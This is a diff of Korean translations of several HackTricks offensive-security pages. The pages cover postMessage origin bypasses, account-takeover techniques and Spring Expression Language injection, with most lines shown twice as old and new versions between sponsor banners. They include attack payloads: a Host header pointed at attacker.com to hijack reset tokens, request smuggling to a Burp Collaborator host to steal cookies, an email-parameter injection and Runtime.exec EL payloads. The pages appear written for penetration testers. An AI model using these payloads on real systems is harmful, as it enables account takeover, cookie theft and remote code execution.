이 취약점의 맥락에서 `File` 객체는 읽기 전용 `name` 속성으로 인해 주목할만한 취약점이 있습니다. 이 속성은 템플릿에서 사용될 때 `escapeHtml` 함수에 의해 정리되지 않아 잠재적인 보안 위험을 초래할 수 있습니다.
이 취약점의 맥락에서 `File` 객체는 읽기 전용 `name` 속성으로 인해 주목할 만한 취약점이 있습니다. 이 속성은 템플릿에서 사용될 때 `escapeHtml` 함수에 의해 살균되지 않아 잠재적인 보안 위험을 초래할 수 있습니다.
- JavaScript의 `document.domain` 속성은 도메인을 단축시키기 위해 스크립트에 의해 설정될 수 있으며, 동일한 부모 도메인 내에서 보다 유연한 동일 출처 정책 적용을 허용합니다.
### e.origin == window.origin 우회
%%%%%%를 사용하여 **sandboxed iframe** 내에 웹 페이지를 임베드할 때, iframe의 원본이 null로 설정됨을 이해하는 것이 중요합니다. 이는 **sandbox 속성** 및 보안 및 기능에 대한 영향을 고려할 때 특히 중요합니다.
sandbox 속성에 **`allow-popups`**를 지정하면 iframe 내에서 열린 팝업 창은 부모의 sandbox 제한을 상속합니다. 이는 팝업 창의 원본이 `null`로 설정되므로, 팝업 창의 원본이 iframe의 원본과 일치하도록 하는 경우 **`allow-popups-to-escape-sandbox`** 속성이 포함되지 않는 한, 팝업 창의 원본도 `null`로 설정됩니다.
sandbox 속성에 **`allow-popups`**를 지정하면 iframe 내에서 열린 팝업 창은 부모의 sandbox 제한을 상속합니다. 이는 팝업 창의 원본이 `null`로 설정되므로, 팝업 창의 원본이 iframe의 원본과 일치하게 됩니다. 이러한 조건에서 팝업이 열리고 iframe에서 팝업으로 **`postMessage`**를 통해 메시지를 보낼 때, 보내는 쪽과 받는 쪽의 원본이 모두 `null`로 설정됩니다. 이 상황은 iframe과 팝업이 모두 `null`의 동일한 원본 값을 가지므로 **`e.origin == window.origin`**이 true로 평가됩니다 (`null == null`).
결과적으로 이러한 조건에서 팝업이 열리고 iframe에서 팝업으로 **`postMessage`**를 통해 메시지가 전송되면, 보내는 쪽과 받는 쪽의 원본이 모두 `null`로 설정됩니다. 이 상황은 iframe과 팝업이 모두 `null`의 동일한 원본 값을 가지므로 **`e.origin == window.origin`**이 true로 평가됩니다 (`null == null`).
더 많은 정보를 원하시면 **다음을 읽으십시오**:
자세한 정보는 **다음을 읽으십시오**:
{% content-ref url="bypassing-sop-with-iframes-1.md" %}
[bypassing-sop-with-iframes-1.md](bypassing-sop-with-iframes-1.md)
@ -157,16 +155,16 @@ sandbox 속성에 **`allow-popups`**를 지정하면 iframe 내에서 열린 팝
### e.source 우회
메시지가 스크립트가 수신 대기 중인 동일한 창에서 왔는지 확인하는 것이 가능합니다 (특히 **브라우저 확장 프로그램의 콘텐츠 스크립트**의 경우 페이지에서 메시지가 보내졌는지 확인하는 데 특히 흥미로울 수 있음):
메시지가 스크립트가 수신 대기 중인 동일한 창에서 왔는지 확인하는 것이 가능합니다 (특히 **브라우저 확장 프로그램의 콘텐츠 스크립트**의 경우 페이지에서 보낸 메시지인지 확인하는 데 특히 흥미로울 수 있음):
```javascript
// If its not, return immediately.
if( received_message.source !== window ) {
return;
}
```
메시지의 **`e.source`**를 null로 강제할 수 있습니다. 이를 위해 **`postMessage`를 보내고 즉시 삭제되는** **iframe**을 생성합니다.
메시지의 **`e.source`**를 null로 강제할 수 있습니다. 이를 위해 **`postMessage`**를 보내고 **즉시 삭제되는 iframe**을 생성합니다.
자세한 정보는 **다음을 참조하십시오:**
자세한 정보는 다음을 참조하십시오:
{% content-ref url="bypassing-sop-with-iframes-2.md" %}
[bypassing-sop-with-iframes-2.md](bypassing-sop-with-iframes-2.md)
@ -174,7 +172,7 @@ return;
### X-Frame-Header 우회
이러한 공격을 수행하려면 이상적으로 **피해자 웹 페이지**`iframe` 안에 넣을 수 있어야 합니다. 그러나 `X-Frame-Header`와 같은 일부 헤더는 그 **동작을 방지**할 수 있습니다.\
이러한 공격을 수행하기 위해 이상적으로는 피해 웹 페이지`iframe` 안에 넣을 수 있어야 합니다. 그러나 `X-Frame-Header`와 같은 일부 헤더는 그 **동작을 방지**할 수 있습니다.\
이러한 시나리오에서는 여전히 덜 은밀한 공격을 사용할 수 있습니다. 취약한 웹 응용 프로그램으로 새 탭을 열고 통신할 수 있습니다:
```markup
<script>
@ -182,17 +180,17 @@ var w=window.open("<url>")
setTimeout(function(){w.postMessage('text here','*');}, 2000);
</script>
```
### 메인 페이지 차단을 통한 자식에게 보낸 메시지 도용
### 메시지를 훔치는 방법: 메인 페이지 차단
다음 페이지에서는 **주요 페이지를 차단**하여 데이터를 보내기 전에 **주요 페이지를 차단**하고 **자식 iframe**로 전송된 **민감한 postmessage 데이터**를 도용하고 **자식의 XSS를 악용**하여 데이터가 수신되기 전에 **데이터를 노출**하는 방법을 볼 수 있습니다:
다음 페이지에서는 **주요 페이지를 차단**하고 데이터를 전송하기 전에 **주요 페이지를 차단**하여 **자식 iframe**로 전송된 **민감한 postmessage 데이터**를 훔칠 수 있는 방법을 볼 수 있습니다. 그리고 데이터가 수신되기 전에 **자식 iframe**에서 **데이터를 유출**하는 방법을 악용합니다:
{% content-ref url="blocking-main-page-to-steal-postmessage.md" %}
[blocking-main-page-to-steal-postmessage.md](blocking-main-page-to-steal-postmessage.md)
{% endcontent-ref %}
### iframe 위치 수정을 통한 메시지 도용
### iframe 위치 수정으로 메시지 훔치기
다른 iframe을 포함하는 X-Frame-Header가 없는 웹페이지를 iframe으로 포함할 수 있다면, **해당 자식 iframe의 위치를 변경**할 수 있으므로, **와일드카드를 사용하여 전송된 postmessage**를 수신 중인 경우, 공격자는 해당 iframe **원본**을 자신이 **제어하는 페이지로 변경**하여 메시지를 **도용**할 수 있습니다:
만약 X-Frame-Header가 없는 웹페이지를 iframe으로 포함하고 있는 경우, 해당 자식 iframe의 위치를 변경할 수 있습니다. 따라서 **와일드카드**를 사용하여 **전송된 postmessage**를 수신하는 경우, 공격자는 해당 iframe **원본**을 자신이 **제어하는 페이지**로 **변경**하여 메시지를 **훔칠** 수 있습니다:
{% content-ref url="steal-postmessage-modifying-iframe-location.md" %}
[steal-postmessage-modifying-iframe-location.md](steal-postmessage-modifying-iframe-location.md)
@ -200,11 +198,11 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
### postMessage를 통한 Prototype Pollution 및/또는 XSS
`postMessage`를 통해 전송된 데이터가 JS에 의해 실행되는 시나리오에서는 **페이지를 iframe으로 포함**하고 **prototype pollution/XSS를 악용**하여 exploit을 `postMessage`를 통해 전송할 수 있습니다.
`postMessage`를 통해 전송된 데이터가 JS에 의해 실행되는 시나리오에서, **페이지를 iframe**으로 포함하고 **prototype pollution/XSS**를 악용하여 `postMessage`를 통해 exploit을 전송할 수 있습니다.
`postMessage`를 통해 **매우 잘 설명된 XSS**의 예는 다음에서 찾을 수 있습니다: [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html)
`postMessage`를 통해 **매우 잘 설명된 XSS**의 예는 다음에서 찾을 수 있습니다: [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html)
`iframe``postMessage`를 통해 **Prototype Pollution을 악용한 후 XSS**를 악용하는 exploit 예시:
`iframe``postMessage`를 통해 **Prototype Pollution을 악용한 뒤 XSS**를 악용하는 exploit의 예시:
```html
<html>
<body>
@ -224,7 +222,7 @@ setTimeout(get_code, 2000);
* [**프로토타입 오염**](../deserialization/nodejs-proto-prototype-pollution/) 페이지로 이동
* [**XSS**](../xss-cross-site-scripting/) 페이지로 이동
* [**클라이언트 측 프로토타입 오염으로 XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss) 페이지로 이동
* [**클라이언트 측 프로토타입 오염에서 XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss) 페이지로 이동
## 참고 자료
@ -232,13 +230,13 @@ setTimeout(get_code, 2000);
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
* 연습하기: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인하는 **무료** 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취와 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료**로 사용해 볼 수 있습니다:
@ -251,9 +249,9 @@ WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**공식 PEASS & HackTricks 스왹**](https://peass.creator-spring.com)을 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* 💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**를 팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 요령을 공유**하세요.
* **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 요령을 공유**하세요.
</details>

View file

@ -2,23 +2,23 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 **제로**부터 **히어로**로 **AWS 해킹** 배우기!</summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 **제로**부터 **히어로**까지 **AWS 해킹**을 배우세요!</summary>
HackTricks를 지원하는 다른 방법:
* **회사가 HackTricks에 광고**되길 원하거나 **PDF로 HackTricks 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com) 획득
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요. 저희의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **Discord 그룹**에 **가입**하거나 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭**을 공유하세요.
* **회사를 HackTricks에서 광고**하거나 **PDF로 HackTricks 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 요령을 공유**하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, **회사** 또는 **고객**이 **도난당한** **스틸러 악성 소프트웨어**에 의해 **침해**되었는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, **회사** 또는 **고객**이 **스틸러 악성 소프트웨어**에 의해 **침해**되었는지 확인하는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
@ -44,7 +44,7 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
### 사용자 이름 열거
사용자 이름이 이미 응용 프로그램 내에서 등록되었는지 확인하세요.
사용자 이름이 이미 응용 프로그램 내에서 등록되었는지 확인할 수 있는지 확인하세요.
### 암호 정책
@ -53,7 +53,7 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
### SQL Injection
[**이 페이지**](sql-injection/#insert-statement)를 확인하여 등록 양식에서 **SQL Injection**을 사용하여 계정 탈취 또는 정보 추출을 시도하는 방법을 배우세요.
[**이 페이지를 확인하세요**](sql-injection/#insert-statement) : 등록 양식에서 **SQL Injection**을 사용하여 계정 탈취 또는 정보 추출을 시도하는 방법을 배우세요.
### Oauth 탈취
@ -82,10 +82,10 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
### Referrer를 통한 암호 재설정 토큰 누출 <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
1. 이메일 주소로 암호 재설정 요청
2. 암호 재설정 링크를 클릭
1. 이메일 주소로 암호 재설정 요청하세요
2. 암호 재설정 링크를 클릭하세요
3. 암호를 변경하지 마세요
4. 제3자 웹사이트(예: Facebook, Twitter)를 클릭하세요
4. 제 3자 웹사이트(예: Facebook, Twitter)를 클릭하세요
5. Burp Suite 프록시에서 요청을 가로채세요
6. referer 헤더가 암호 재설정 토큰을 누출하는지 확인하세요.
@ -95,7 +95,7 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
2. Burp Suite에서 다음 헤더를 추가하거나 편집하세요: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. 수정된 헤더로 요청을 전달하세요\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. _host 헤더_를 기반으로 암호 재설정 URL을 찾으세요. : `https://attacker.com/reset-password.php?token=TOKEN`
4. _host 헤더_를 기반으로 암호 재설정 URL을 찾으세요 : `https://attacker.com/reset-password.php?token=TOKEN`
### 이메일 매개변수를 통한 암호 재설정 <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```powershell
@ -117,8 +117,8 @@ email=victim@mail.com|hacker@mail.com
### API 매개변수에서 IDOR <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
1. 공격자는 자신의 계정으로 로그인하고 **비밀번호 변경** 기능으로 이동해야 합니다.
2. Burp Suite를 시작하고 요청을 가로채합니다.
3. 요청을 반복기 탭으로 보내고 매개변수를 편집합니다: 사용자 ID/이메일\
2. Burp Suite를 시작하고 요청을 가로채기(intercept) 시작합니다.
3. 요청을 Repeater 탭으로 보내고 매개변수를 편집합니다: 사용자 ID/이메일\
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
### 취약한 비밀번호 재설정 토큰 <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
@ -133,7 +133,7 @@ email=victim@mail.com|hacker@mail.com
* 생년월일
* 암호화
* 숫자만
* 작은 토큰 시퀀스 (문자 사이 \[A-Z,a-z,0-9])
* 작은 토큰 시퀀스 (문자 사이 \[A-Z,a-z,0-9])
* 토큰 재사용
* 토큰 만료 날짜
@ -145,27 +145,27 @@ email=victim@mail.com|hacker@mail.com
### 사용자 이름 충돌을 통한 비밀번호 재설정 <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
1. 희생자의 사용자 이름과 동일한 사용자 이름으로 시스템에 등록하되 사용자 이름 앞 또는/및 뒤에 공백을 삽입합니다. 예: `"admin "`
1. 희생자의 사용자 이름과 동일한 사용자 이름으로 시스템에 등록하되, 사용자 이름 앞 또는 뒤에 공백을 삽입합니다. 예: `"admin "`
2. 악의적인 사용자 이름으로 비밀번호 재설정을 요청합니다.
3. 이메일로 보낸 토큰을 사용하여 희생자의 비밀번호를 재설정합니다.
3. 이메일로 전송된 토큰을 사용하여 희생자의 비밀번호를 재설정합니다.
4. 새 비밀번호로 희생자 계정에 연결합니다.
플랫폼 CTFd는 이 공격에 취약했습니다.\
참조: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
### 크로스 사이트 스크립팅을 통한 계정 탈취 <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
### Cross Site Scripting을 통한 계정 탈취 <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
1. 애플리케이션 내부 또는 쿠키가 상위 도메인에 범위가 지정된 하위 도메인에서 XSS를 찾습니다: `*.domain.com`
1. 애플리케이션 내부 또는 쿠키가 상위 도메인에 범위가 지정된 하위 도메인에서 XSS를 찾습니다. : `*.domain.com`
2. 현재 **세션 쿠키**를 노출합니다.
3. 쿠키를 사용하여 사용자로 인증합니다.
### HTTP 요청 스머글링을 통한 계정 탈취 <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
1\. **smuggler**를 사용하여 HTTP 요청 스머글링 유형을 감지합니다 (CL, TE, CL.TE)\
1. **smuggler**를 사용하여 HTTP 요청 스머글링 유형을 감지합니다 (CL, TE, CL.TE)\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2\. `POST / HTTP/1.1`을 다음 데이터로 덮어쓸 요청을 작성합니다:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` 희생자를 burpcollab로 리디렉션하여 쿠키를 도용합니다\
3\. 최종 요청은 다음과 같이 보일 수 있습니다.
2. `POST / HTTP/1.1`을 다음 데이터로 덮어쓸 요청을 작성합니다.\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` 희생자를 burpcollab로 리디렉션하고 쿠키를 도용하는 것이 목표입니다.\
3. 최종 요청은 다음과 같이 보일 수 있습니다.
```
GET / HTTP/1.1
Transfer-Encoding: chunked
@ -182,7 +182,7 @@ X: X
1. CSRF를 위한 payload 생성, 예: "비밀번호 변경을 위한 자동 제출이 포함된 HTML 폼"
2. Payload 전송
### JWT를 통한 계정 탈취 <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
### Account Takeover via JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
JSON Web Token은 사용자를 인증하는 데 사용될 수 있습니다.
@ -193,34 +193,34 @@ JSON Web Token은 사용자를 인증하는 데 사용될 수 있습니다.
[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
{% endcontent-ref %}
## 참고 자료
## References
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인하는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로 인한 계정 탈취와 랜섬웨어 공격에 대항하는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료**로 사용해 볼 수 있습니다:
그들의 웹사이트를 방문하여 **무료**로 엔진을 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>제로부터 AWS 해킹을 전문가로 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **HackTricks에 귀사를 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **HackTricks에서 귀하의 회사를 광고하거나 PDF로 다운로드하려면** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구입하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**를 팔로우**하세요.
* **HackTricks 및 HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**를 팔로우**하세요.
* **HackTricks 및 HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 귀하의 해킹 트릭을 공유하세요.
</details>

View file

@ -2,25 +2,25 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 **제로**부터 **히어로**로 **AWS 해킹**을 배우세요!</summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 **제로**부터 **히어로**로 **AWS 해킹을 배우세요**!</summary>
* **사이버 보안 회사**에서 일하시나요? **HackTricks에 귀사를 광고**하고 싶으신가요? 혹은 **PEASS의 최신 버전에 액세스**하거나 **HackTricks를 PDF로 다운로드**하고 싶으신가요? [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 저희의 독점 [**NFT 컬렉션**](https://opensea.io/collection/the-peass-family)
* [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 얻으세요
* [**💬**](https://emojipedia.org/speech-balloon/) **Discord 그룹**에 **가입**하거나 [**텔레그램 그룹**](https://t.me/peass)에 참여하거나 **트위터**에서 **팔로우**하세요 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **해킹 트릭을 공유**하려면 **PR을 제출**하여 [**hacktricks repo**](https://github.com/carlospolop/hacktricks)와 [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)에 참여하세요.
* **사이버 보안 회사**에서 일하시나요? **회사가 HackTricks에 광고**되길 원하시나요? 혹은 **PEASS의 최신 버전에 액세스**하거나 **HackTricks를 PDF로 다운로드**하길 원하시나요? [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, **독점 NFT** 컬렉션입니다.
* [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 얻으세요.
* [**💬**](https://emojipedia.org/speech-balloon/) **Discord 그룹**에 가입하거나 [**텔레그램 그룹**](https://t.me/peass)에 참여하거나 **트위터**에서 **팔로우**하세요 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **해킹 트릭을 공유하고 PR을 제출하여** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **및** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **에 참여하세요**.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)**다크 웹**을 기반으로 한 검색 엔진으로, **회사나 고객이** **스틸러 악성 소프트웨어**에 의해 **침해**를 받았는지 **무료**로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**되었는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로 인한 계정 탈취 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로 인한 계정 탈취 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 **무료**로 엔진을 시도해 볼 수 있습니다:
그들의 웹사이트를 확인하고 엔진을 **무료로** 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -28,28 +28,28 @@ WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로
## 기본 정보
표현 언어 (EL)은 JavaEE에서 프레젠테이션 레이어(예: 웹 페이지)와 애플리케이션 로직(예: 관리 빈)을 연결하여 상호 작용할 수 있도록 하는 데 중요합니다. 다음에서 주로 사용됩니다:
표현 언어 (EL)은 JavaEE에서 프레젠테이션 레이어(예: 웹 페이지)와 애플리케이션 로직(예: 관리 빈)을 연결하여 상호 작용할 수 있 하는 데 중요합니다. 다음에서 주로 사용됩니다:
- **JavaServer Faces (JSF)**: UI 구성 요소를 백엔드 데이터/동작에 바인딩하는 데 사용됩니다.
- **JavaServer Pages (JSP)**: JSP 페이지 내에서 데이터 액세스 및 조작에 사용됩니다.
- **Contexts and Dependency Injection for Java EE (CDI)**: 웹 레이어 상호 작용을 관리 빈과 함께 용이하게 합니다.
**사용 컨텍스트**:
**사용 환경**:
- **Spring Framework**: 보안 및 데이터와 같은 다양한 모듈에서 사용됩니다.
- **일반 사용**: Java, Kotlin, Scala와 같은 JVM 기반 언어의 개발자들이 SpEL API를 통해 사용합니다.
- **일반적인 사용**: Java, Kotlin, Scala와 같은 JVM 기반 언어의 개발자들이 SpEL API를 통해 사용합니다.
EL은 JavaEE 기술, 독립 환경에서 사용되며 `.jsp` 또는 `.jsf` 파일 확장자, 스택 오류 및 헤더에서 "Servlet"과 같은 용어를 통해 인식할 수 있습니다. 그러나 특정 문자의 사용 및 기능은 버전에 따라 다를 수 있습니다.
{% hint style="info" %}
**EL 버전**에 따라 일부 **기능**이 **활성화** 또는 **비활성화**되며 일부 **문자**가 **허용되지 않을 수** 있습니다.
**EL 버전**에 따라 일부 **기능**이 **활성화** 또는 **비활성화**되며 일반적으로 일부 **문자**가 **허용되지 않을 수** 있습니다.
{% endhint %}
## 기본 예제
(다른 흥미로운 EL 튜토리얼을 [https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/)에서 찾을 수 있습니다)
[**Maven**](https://mvnrepository.com) 저장소에서 다음 jar 파일을 다운로드하세요:
[Maven](https://mvnrepository.com) 저장소에서 다음 jar 파일을 다운로드하세요:
* `commons-lang3-3.9.jar`
* `spring-core-5.2.1.RELEASE.jar`
@ -81,7 +81,7 @@ System.out.println(result);
```java
javac -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main.java
```
애플리케이션을 실행하려면 다음을 실행하세요:
애플리케이션을 실행하려면:
```java
java -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main
Enter a String to evaluate:
@ -219,7 +219,7 @@ T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec
```bash
${sessionScope.toString()}
```
#### 권한 우회 예
#### 권한 우회 예
```bash
${pageContext.request.getSession().setAttribute("admin", true)}
```
@ -231,7 +231,7 @@ ${employee.FirstName}
```
## WAF Bypass
[https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/)를 확인하세요.
[https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/)
## 참고 자료
@ -240,26 +240,26 @@ ${employee.FirstName}
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
